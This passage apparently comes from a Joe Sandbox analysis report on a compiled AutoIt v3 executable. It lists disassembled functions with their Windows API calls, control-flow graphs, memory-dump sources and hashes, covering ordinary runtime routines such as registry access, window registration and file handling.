                APIs
                • GetCurrentProcess.KERNEL32(?,?,00BC504E,?,00C698D8,0000000C,00BC51A5,?,00000002,00000000), ref: 00BC5099
                • TerminateProcess.KERNEL32(00000000,?,00BC504E,?,00C698D8,0000000C,00BC51A5,?,00000002,00000000), ref: 00BC50A0
                • ExitProcess.KERNEL32 ref: 00BC50B2
                Memory Dump Source
                • Source File: 00000006.00000002.333898494.0000000000BA1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00BA0000, based on PE: true
                • Associated: 00000006.00000002.333891754.0000000000BA0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.333987408.0000000000C3D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.333987408.0000000000C63000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334023259.0000000000C6D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000C75000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000CBC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000CBE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_6_2_ba0000_ihgsvw.jbxd
                Similarity
                • API ID: Process$CurrentExitTerminate
                • String ID:
                • API String ID: 1703294689-0
                • Opcode ID: 3a763dccc2defa033d24e5699b6eb92e136c13b59f2a937a3e0b14232fa5b401
                • Instruction ID: 830189fa6eefc7411b7f994353feb975380f124bcceec43f64f98451206b5fe1
                • Opcode Fuzzy Hash: 3a763dccc2defa033d24e5699b6eb92e136c13b59f2a937a3e0b14232fa5b401
                • Instruction Fuzzy Hash: CAE0B631510548AFCF216F64ED09F5C3BB9EB40791F004058F8068A132DB35ED92CB91
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00BC0D65 Relevance: 1.5, APIs: 1, Instructions: 3COMMON
                Download Yara Rule
                APIs
                • SetUnhandledExceptionFilter.KERNELBASE(Function_00020D71,00BC077E), ref: 00BC0D6A
                Memory Dump Source
                • Source File: 00000006.00000002.333898494.0000000000BA1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00BA0000, based on PE: true
                • Associated: 00000006.00000002.333891754.0000000000BA0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.333987408.0000000000C3D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.333987408.0000000000C63000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334023259.0000000000C6D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000C75000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000CBC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000CBE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_6_2_ba0000_ihgsvw.jbxd
                Similarity
                • API ID: ExceptionFilterUnhandled
                • String ID:
                • API String ID: 3192549508-0
                • Opcode ID: 2fc2a888be0037c420f0ed28d33b0a0276c59aea19e3cced07d0c37cabdd8851
                • Instruction ID: 7f547b40600df6938f3eb48cf832f6b077fecbba2cef6ae69626776dcd398836
                • Opcode Fuzzy Hash: 2fc2a888be0037c420f0ed28d33b0a0276c59aea19e3cced07d0c37cabdd8851
                • Instruction Fuzzy Hash:
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00C2CD16 Relevance: 30.2, APIs: 11, Strings: 6, Instructions: 495registryCOMMON
                Download Yara Rule

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 0 c2cd16-c2cd5a call babf07 * 3 7 c2cd65-c2cdd8 call ba8e70 call c2d6b1 call c2d2f7 0->7 8 c2cd5c-c2cd5f 0->8 22 c2cdda-c2cde8 7->22 23 c2ce08-c2ce0d 7->23 8->7 9 c2ce64-c2ce71 call bae650 8->9 15 c2d1ef-c2d212 call babd2c * 3 9->15 24 c2cdea 22->24 25 c2cded-c2cdfd 22->25 27 c2ce0f-c2ce24 RegConnectRegistryW 23->27 28 c2ce7c 23->28 24->25 29 c2ce02-c2ce06 25->29 30 c2cdff 25->30 33 c2ce76-c2ce7a 27->33 34 c2ce26-c2ce43 call ba7ab0 27->34 31 c2ce80-c2ceab RegCreateKeyExW 28->31 35 c2ce61-c2ce63 29->35 30->29 36 c2cf0e-c2cf13 31->36 37 c2cead-c2ceca call ba7ab0 31->37 33->31 46 c2ce45 34->46 47 c2ce48-c2ce58 34->47 35->9 42 c2d1d6-c2d1e7 RegCloseKey 36->42 43 c2cf19-c2cf42 call ba8e70 call bc4db8 36->43 50 c2cecf-c2cede 37->50 51 c2cecc 37->51 42->15 48 c2d1e9-c2d1ed RegCloseKey 42->48 59 c2cf96-c2cfb9 call ba8e70 call bc4db8 43->59 60 c2cf44-c2cf91 call ba8e70 call bc4cf3 call ba8e70 * 2 43->60 46->47 52 c2ce5a 47->52 53 c2ce5d 47->53 48->15 55 c2cee3-c2cef9 call bae650 50->55 56 c2cee0 50->56 51->50 52->53 53->35 55->15 63 c2ceff-c2cf09 RegCloseKey 55->63 56->55 71 c2d047-c2d06a call ba8e70 call bc4db8 59->71 72 c2cfbf-c2d019 call ba8e70 call bc4cf3 call ba8e70 * 2 RegSetValueExW 59->72 85 c2d2bb-c2d2c7 RegSetValueExW 60->85 63->15 86 c2d070-c2d0d6 call ba8e70 call bc019b call ba8e70 call ba605e 71->86 87 c2d156-c2d179 call ba8e70 call bc4db8 71->87 72->42 105 c2d01f-c2d042 call ba7ab0 call bae650 72->105 85->42 89 c2d2cd-c2d2f2 call ba7ab0 call bae650 85->89 124 c2d0f6-c2d128 call ba8e70 RegSetValueExW 86->124 125 c2d0d8-c2d0dd 86->125 106 c2d215-c2d238 call ba8e70 call bc4db8 87->106 107 c2d17f-c2d19f call bac92d call ba8e70 87->107 89->42 105->42 128 c2d265-c2d282 call ba8e70 call bc4db8 106->128 129 c2d23a-c2d260 call bac5df call ba8e70 106->129 127 c2d1a1-c2d1b4 RegSetValueExW 107->127 139 c2d14a-c2d151 call bc01a4 124->139 140 c2d12a-c2d143 call ba7ab0 call bae650 124->140 130 c2d0e5-c2d0e8 125->130 131 c2d0df-c2d0e1 125->131 127->42 135 c2d1b6-c2d1c0 call ba7ab0 127->135 145 c2d1c5-c2d1cf call bae650 128->145 153 c2d288-c2d2b9 call c1276a call ba8e70 call c127da 128->153 129->127 130->125 132 c2d0ea-c2d0ec 130->132 131->130 132->124 137 c2d0ee-c2d0f2 132->137 135->145 137->124 139->42 140->139 145->42 153->85
                APIs
                • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00C2CE1C
                • RegCreateKeyExW.KERNELBASE(?,?,00000000,00C3DCD0,00000000,?,00000000,?,?), ref: 00C2CEA3
                • RegCloseKey.ADVAPI32(00000000,00000000,00000000), ref: 00C2CF03
                • _wcslen.LIBCMT ref: 00C2CF53
                • _wcslen.LIBCMT ref: 00C2CFCE
                • RegSetValueExW.KERNELBASE(00000001,?,00000000,00000001,?,?), ref: 00C2D011
                • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000007,?,?), ref: 00C2D120
                • RegSetValueExW.ADVAPI32(00000001,?,00000000,0000000B,?,00000008), ref: 00C2D1AC
                • RegCloseKey.KERNELBASE(?), ref: 00C2D1E0
                • RegCloseKey.ADVAPI32(00000000), ref: 00C2D1ED
                • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000003,00000000,00000000), ref: 00C2D2BF
                Strings
                Memory Dump Source
                • Source File: 00000006.00000002.333898494.0000000000BA1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00BA0000, based on PE: true
                • Associated: 00000006.00000002.333891754.0000000000BA0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.333987408.0000000000C3D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.333987408.0000000000C63000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334023259.0000000000C6D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000C75000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000CBC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000CBE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_6_2_ba0000_ihgsvw.jbxd
                Similarity
                • API ID: Value$Close$_wcslen$ConnectCreateRegistry
                • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                • API String ID: 9721498-966354055
                • Opcode ID: 3b82942b4c3f64935ed67ba690297d359f684bc5f1474510ad019876e5604f8d
                • Instruction ID: 641a31225040d456d05017bb9499b6827898cae7810123c7e5e79d5aa2d8acd8
                • Opcode Fuzzy Hash: 3b82942b4c3f64935ed67ba690297d359f684bc5f1474510ad019876e5604f8d
                • Instruction Fuzzy Hash: E81247356082119FDB14DF24D891B2AB7E5FF89724F14849CF89A9B7A2CB31ED41CB81
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00BA3E15 Relevance: 28.3, APIs: 1, Strings: 15, Instructions: 273COMMON
                Download Yara Rule

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 163 ba3e15-ba3e45 call bc019b call bc016b 168 ba3e6e-ba3e80 call bc919b 163->168 169 ba3e47-ba3e49 163->169 170 ba3e4a-ba3e50 168->170 176 ba3e82-ba3e94 call bc919b 168->176 169->170 172 ba3e52-ba3e62 call bc015d call bc01a4 170->172 173 ba3e65-ba3e6b 170->173 172->173 182 ba3e9a-ba3eac call bc919b 176->182 183 be4585-be4587 176->183 186 be458c-be458f 182->186 187 ba3eb2-ba3ec4 call bc919b 182->187 183->170 186->170 190 ba3eca-ba3edc call bc919b 187->190 191 be4594-be45cb call ba4154 call ba4093 call ba3fb8 call bc4cf3 187->191 196 be462e-be4633 190->196 197 ba3ee2-ba3ef4 call bc919b 190->197 219 be45cd-be45d8 191->219 220 be4608-be460b 191->220 196->170 199 be4639-be4655 call bbe2e5 196->199 206 ba3efa-ba3f0c call bc919b 197->206 207 be4677-be4688 call c0a316 197->207 209 be4657-be465b 199->209 210 be4662-be466a 199->210 221 ba3f0e-ba3f20 call bc919b 206->221 222 ba3f26 206->222 223 be46dc-be46e2 207->223 224 be468a-be46d2 call bab25f * 2 call ba5379 call ba3aa3 call babd2c * 2 207->224 209->199 215 be465d 209->215 210->170 216 be4670 210->216 215->170 216->207 219->220 226 be45da-be45e1 219->226 227 be460d-be461b 220->227 228 be45f6-be4603 call bc01a4 220->228 221->170 221->222 225 ba3f29-ba3f2e call baad74 222->225 229 be46f5-be46ff call c0a12a 223->229 242 be4704-be4706 224->242 268 be46d4-be46d7 224->268 238 ba3f33-ba3f35 225->238 226->228 233 be45e3-be45e7 226->233 241 be4620-be4629 call bc01a4 227->241 228->229 229->242 233->228 239 be45e9-be45f4 233->239 245 ba3f3b-ba3f5e call ba3fb8 call ba4093 call bc919b 238->245 246 be46e4-be46e9 238->246 239->241 241->170 242->170 264 ba3fb0-ba3fb3 245->264 265 ba3f60-ba3f72 call bc919b 245->265 246->170 251 be46ef-be46f0 246->251 251->229 264->225 265->264 270 ba3f74-ba3f86 call bc919b 265->270 268->170 273 ba3f88-ba3f9a call bc919b 270->273 274 ba3f9c-ba3fa5 270->274 273->225 273->274 274->170 276 ba3fab 274->276 276->225
                Strings
                Memory Dump Source
                • Source File: 00000006.00000002.333898494.0000000000BA1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00BA0000, based on PE: true
                • Associated: 00000006.00000002.333891754.0000000000BA0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.333987408.0000000000C3D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.333987408.0000000000C63000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334023259.0000000000C6D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000C75000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000CBC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000CBE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_6_2_ba0000_ihgsvw.jbxd
                Similarity
                • API ID:
                • String ID: "$#OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$'$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
                • API String ID: 0-1645009161
                • Opcode ID: ba76f6bb5a9fd66ddfd94915e3cd4422849d7f756e0ab87144f1a47cc03bb38b
                • Instruction ID: 73a90d1844c69e6b69805cfdd538814273dc2337e116b5d6ce4f3ff209735b4b
                • Opcode Fuzzy Hash: ba76f6bb5a9fd66ddfd94915e3cd4422849d7f756e0ab87144f1a47cc03bb38b
                • Instruction Fuzzy Hash: FF812671A48205BFDB10AF61DC46FAE7BE8EF16B00F0440E4F905AA192EB71DB51D7A1
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00BC0456 Relevance: 26.3, APIs: 10, Strings: 5, Instructions: 81COMMON
                Download Yara Rule

                Control-flow Graph

                APIs
                • __scrt_initialize_thread_safe_statics_platform_specific.LIBCMT ref: 00BC0456
                  • Part of subcall function 00BC047D: InitializeCriticalSectionAndSpinCount.KERNEL32(00C7170C,00000FA0,630BFAD0,?,?,?,?,00BE2753,000000FF), ref: 00BC04AC
                  • Part of subcall function 00BC047D: GetModuleHandleW.KERNELBASE(api-ms-win-core-synch-l1-2-0.dll,?,?,?,?,00BE2753,000000FF), ref: 00BC04B7
                  • Part of subcall function 00BC047D: GetModuleHandleW.KERNEL32(kernel32.dll,?,?,?,?,00BE2753,000000FF), ref: 00BC04C8
                  • Part of subcall function 00BC047D: GetProcAddress.KERNEL32(00000000,InitializeConditionVariable), ref: 00BC04DE
                  • Part of subcall function 00BC047D: GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 00BC04EC
                  • Part of subcall function 00BC047D: GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 00BC04FA
                  • Part of subcall function 00BC047D: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 00BC0525
                  • Part of subcall function 00BC047D: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 00BC0530
                • ___scrt_fastfail.LIBCMT ref: 00BC0477
                  • Part of subcall function 00BC0433: __onexit.LIBCMT ref: 00BC0439
                Strings
                • WakeAllConditionVariable, xrefs: 00BC04F2
                • InitializeConditionVariable, xrefs: 00BC04D8
                • kernel32.dll, xrefs: 00BC04C3
                • api-ms-win-core-synch-l1-2-0.dll, xrefs: 00BC04B2
                • SleepConditionVariableCS, xrefs: 00BC04E4
                Memory Dump Source
                • Source File: 00000006.00000002.333898494.0000000000BA1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00BA0000, based on PE: true
                • Associated: 00000006.00000002.333891754.0000000000BA0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.333987408.0000000000C3D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.333987408.0000000000C63000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334023259.0000000000C6D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000C75000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000CBC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000CBE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_6_2_ba0000_ihgsvw.jbxd
                Similarity
                • API ID: AddressProc$HandleModule__crt_fast_encode_pointer$CountCriticalInitializeSectionSpin___scrt_fastfail__onexit__scrt_initialize_thread_safe_statics_platform_specific
                • String ID: InitializeConditionVariable$SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
                • API String ID: 66158676-1714406822
                • Opcode ID: 0931f7e2538518ed53d09393927a8e2de796ba065425f7fc1b994f998592ede5
                • Instruction ID: 7b69f2b09e001a67ee150e5ebbd396ddcb8705134d2b93db20f02d8991298a6a
                • Opcode Fuzzy Hash: 0931f7e2538518ed53d09393927a8e2de796ba065425f7fc1b994f998592ede5
                • Instruction Fuzzy Hash: 9121C332BA4711EBD7147BA8AC46F6E76E4EB04B61F1441ADFA0696290DFB09C008A50
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00BAEDE0 Relevance: 21.6, APIs: 14, Instructions: 619windowsleeptimeCOMMON
                Download Yara Rule
                APIs
                Memory Dump Source
                • Source File: 00000006.00000002.333898494.0000000000BA1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00BA0000, based on PE: true
                • Associated: 00000006.00000002.333891754.0000000000BA0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.333987408.0000000000C3D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.333987408.0000000000C63000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334023259.0000000000C6D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000C75000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000CBC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000CBE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_6_2_ba0000_ihgsvw.jbxd
                Similarity
                • API ID: Message$Peek$DispatchInputSleepStateTimeTranslatetime
                • String ID:
                • API String ID: 2189390790-0
                • Opcode ID: a20e7cd91c64eecb1226349a1521be315ccb860614f7f3971328a1649584245a
                • Instruction ID: 8d7b7d0cb617300b96b80b7bd38c0fa7f3e1dda3b9d718e621395877e1e8e701
                • Opcode Fuzzy Hash: a20e7cd91c64eecb1226349a1521be315ccb860614f7f3971328a1649584245a
                • Instruction Fuzzy Hash: 4542EE70608342EFDB24CF24C884BBABBE5FF86300F1445A9F56587291D771E988CB92
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00BA35AB Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 53windowregistryCOMMON
                Download Yara Rule

                Control-flow Graph

                APIs
                • GetSysColorBrush.USER32(0000000F), ref: 00BA35DE
                • RegisterClassExW.USER32 ref: 00BA3608
                • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00BA3619
                • InitCommonControlsEx.COMCTL32(?), ref: 00BA3636
                • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00BA3646
                • LoadIconW.USER32 ref: 00BA365C
                • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00BA366B
                Strings
                Memory Dump Source
                • Source File: 00000006.00000002.333898494.0000000000BA1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00BA0000, based on PE: true
                • Associated: 00000006.00000002.333891754.0000000000BA0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.333987408.0000000000C3D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.333987408.0000000000C63000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334023259.0000000000C6D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000C75000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000CBC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000CBE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_6_2_ba0000_ihgsvw.jbxd
                Similarity
                • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                • API String ID: 2914291525-1005189915
                • Opcode ID: e416550c3a3098383286c4a93e5eeb07e4e5833d8a97a6f834a4d92f66ddbae4
                • Instruction ID: 3bab716029fef349918e0fee5e3ebde33a8fd591d1422e75c46b16441fedf096
                • Opcode Fuzzy Hash: e416550c3a3098383286c4a93e5eeb07e4e5833d8a97a6f834a4d92f66ddbae4
                • Instruction Fuzzy Hash: 5421CFB1921319AFDB00DFA4EC89B9DBBB8FB09700F00411AF616A62A0D7B55585CFA0
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00BE09FB Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 272COMMONLIBRARYCODE
                Download Yara Rule

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 677 be09fb-be0a2b call be07cf 680 be0a2d-be0a38 call bcf656 677->680 681 be0a46-be0a52 call bd55b1 677->681 688 be0a3a-be0a41 call bcf669 680->688 686 be0a6b-be0ab4 call be073a 681->686 687 be0a54-be0a69 call bcf656 call bcf669 681->687 696 be0ab6-be0abf 686->696 697 be0b21-be0b2a GetFileType 686->697 687->688 698 be0d1d-be0d23 688->698 702 be0af6-be0b1c GetLastError __dosmaperr 696->702 703 be0ac1-be0ac5 696->703 699 be0b2c-be0b5d GetLastError __dosmaperr CloseHandle 697->699 700 be0b73-be0b76 697->700 699->688 704 be0b63-be0b6e call bcf669 699->704 705 be0b7f-be0b85 700->705 706 be0b78-be0b7d 700->706 702->688 703->702 707 be0ac7-be0af4 call be073a 703->707 704->688 709 be0b89-be0bd7 call bd54fa 705->709 710 be0b87 705->710 706->709 707->697 707->702 716 be0bd9-be0be5 call be094b 709->716 717 be0be7-be0c0b call be04ed 709->717 710->709 716->717 724 be0c0f-be0c19 call bd8a3e 716->724 722 be0c1e-be0c61 717->722 723 be0c0d 717->723 726 be0c82-be0c90 722->726 727 be0c63-be0c67 722->727 723->724 724->698 730 be0d1b 726->730 731 be0c96-be0c9a 726->731 727->726 729 be0c69-be0c7d 727->729 729->726 730->698 731->730 732 be0c9c-be0ccf CloseHandle call be073a 731->732 735 be0d03-be0d17 732->735 736 be0cd1-be0cfd GetLastError __dosmaperr call bd56c3 732->736 735->730 736->735
                APIs
                  • Part of subcall function 00BE073A: CreateFileW.KERNELBASE(00000000,00000000,?,00BE0AA4,?,?,00000000,?,00BE0AA4,00000000,0000000C), ref: 00BE0757
                • GetLastError.KERNEL32 ref: 00BE0B0F
                • __dosmaperr.LIBCMT ref: 00BE0B16
                • GetFileType.KERNELBASE(00000000), ref: 00BE0B22
                • GetLastError.KERNEL32 ref: 00BE0B2C
                • __dosmaperr.LIBCMT ref: 00BE0B35
                • CloseHandle.KERNEL32(00000000), ref: 00BE0B55
                • CloseHandle.KERNEL32(?), ref: 00BE0C9F
                • GetLastError.KERNEL32 ref: 00BE0CD1
                • __dosmaperr.LIBCMT ref: 00BE0CD8
                Strings
                Memory Dump Source
                • Source File: 00000006.00000002.333898494.0000000000BA1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00BA0000, based on PE: true
                • Associated: 00000006.00000002.333891754.0000000000BA0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.333987408.0000000000C3D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.333987408.0000000000C63000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334023259.0000000000C6D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000C75000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000CBC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000CBE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_6_2_ba0000_ihgsvw.jbxd
                Similarity
                • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                • String ID: H
                • API String ID: 4237864984-2852464175
                • Opcode ID: 5602da2e32bb298dab2dabf3ff5b10dd9ce37b1750b7e2331ba4d549e659d639
                • Instruction ID: da28d3e2ccddb2e2b2e5e7a7da34176b017029e4b76d6324873ef2eed8aefe85
                • Opcode Fuzzy Hash: 5602da2e32bb298dab2dabf3ff5b10dd9ce37b1750b7e2331ba4d549e659d639
                • Instruction Fuzzy Hash: A2A13832A141898FDF19AFB8D892BAD7BF1EB06324F14019DF8119B3A1D7709D82CB51
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00BA522E Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 201registryCOMMON
                Download Yara Rule

                Control-flow Graph

                APIs
                  • Part of subcall function 00BA551B: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,?,?,00BE4B50,?,?,00000100,00000000,00000000,CMDLINE,?,?,00000001,00000000), ref: 00BA5539
                  • Part of subcall function 00BA51BF: GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 00BA51E1
                • RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 00BA534B
                • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 00BE4BD7
                • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 00BE4C18
                • RegCloseKey.ADVAPI32(?), ref: 00BE4C5A
                • _wcslen.LIBCMT ref: 00BE4CC1
                • _wcslen.LIBCMT ref: 00BE4CD0
                Strings
                Memory Dump Source
                • Source File: 00000006.00000002.333898494.0000000000BA1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00BA0000, based on PE: true
                • Associated: 00000006.00000002.333891754.0000000000BA0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.333987408.0000000000C3D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.333987408.0000000000C63000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334023259.0000000000C6D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000C75000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000CBC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000CBE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_6_2_ba0000_ihgsvw.jbxd
                Similarity
                • API ID: NameQueryValue_wcslen$CloseFileFullModuleOpenPath
                • String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
                • API String ID: 98802146-2727554177
                • Opcode ID: e39e1abcf4d7085a487ce1c8dad9246870029a03909c9933d873d6bdf09ecd4d
                • Instruction ID: a60bc6db004405735ec67538f7c24b6b84f1c40283248a27ce50ceb40247b441
                • Opcode Fuzzy Hash: e39e1abcf4d7085a487ce1c8dad9246870029a03909c9933d873d6bdf09ecd4d
                • Instruction Fuzzy Hash: FF717E71518380AEC724EF65E845B6FBBE8FF89340F40046EF449871B1EB709A89DB52
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00BA345A Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 63windowregistryCOMMON
                Download Yara Rule

                Control-flow Graph

                APIs
                • GetSysColorBrush.USER32(0000000F), ref: 00BA3465
                • LoadCursorW.USER32(00000000,00007F00), ref: 00BA3474
                • LoadIconW.USER32 ref: 00BA348A
                • LoadIconW.USER32 ref: 00BA349C
                • LoadIconW.USER32 ref: 00BA34AE
                • LoadImageW.USER32 ref: 00BA34C6
                • RegisterClassExW.USER32 ref: 00BA3517
                  • Part of subcall function 00BA35AB: GetSysColorBrush.USER32(0000000F), ref: 00BA35DE
                  • Part of subcall function 00BA35AB: RegisterClassExW.USER32 ref: 00BA3608
                  • Part of subcall function 00BA35AB: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00BA3619
                  • Part of subcall function 00BA35AB: InitCommonControlsEx.COMCTL32(?), ref: 00BA3636
                  • Part of subcall function 00BA35AB: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00BA3646
                  • Part of subcall function 00BA35AB: LoadIconW.USER32 ref: 00BA365C
                  • Part of subcall function 00BA35AB: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00BA366B
                Strings
                Memory Dump Source
                • Source File: 00000006.00000002.333898494.0000000000BA1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00BA0000, based on PE: true
                • Associated: 00000006.00000002.333891754.0000000000BA0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.333987408.0000000000C3D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.333987408.0000000000C63000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334023259.0000000000C6D000.00000004.00000001.01000000.0000000A.sdmpDownload File
